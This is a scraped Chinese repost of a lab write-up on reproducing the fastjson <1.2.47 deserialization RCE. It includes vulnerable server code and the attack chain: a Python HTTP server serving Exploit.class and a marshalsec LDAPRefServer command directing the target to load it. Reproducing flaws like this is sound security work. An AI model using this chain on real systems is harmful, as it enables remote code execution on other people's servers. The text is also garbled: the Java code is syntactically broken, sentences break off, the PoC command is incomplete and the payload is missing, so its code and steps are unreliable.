fastjson<1.2.47 RCE 漏洞复现
发布时间:2020-12-16 18:40:03 所属栏目:百科 来源:网络整理
导读:这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 package cn.hacktech.fastjsonserver;import com.alibaba.fastjson.JSON;import static spark.Spark.*;public class Main { publ
这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 package cn.hacktech.fastjsonserver; import com.alibaba.fastjson.JSON; import static spark.Spark.*; public class Main { public static void main(String[] args) { get("/hello",(req,res) -> "spark server start success"); post("/test",res) -> { String payload = req.body(); JSON.parse(payload); return "json payload:" + payload; }); } } 编译出来后,启动这个 jar,在 然后这里分两类:
目前测试出来的是 rmi 有版本限制(据说是可能是 8u113 ),打不出来;ldap 是可以的。 本机需要起一个 LDAP 服务和 http 服务 poc-->LDAP-->http poc 会通过上面的路径去请求你的 http 服务上面的对应的 class 文件然后去解析执行这个 class 启动 LDAP 用的 marshalsec,会比较方便。
python -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit 后面的 Exploit 是指 Exploit.class 文件
java -cp fastjson-1.2.47.jar; PoC 其中代码编译的话,直接执行 具体的细节可见代码打包文件 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |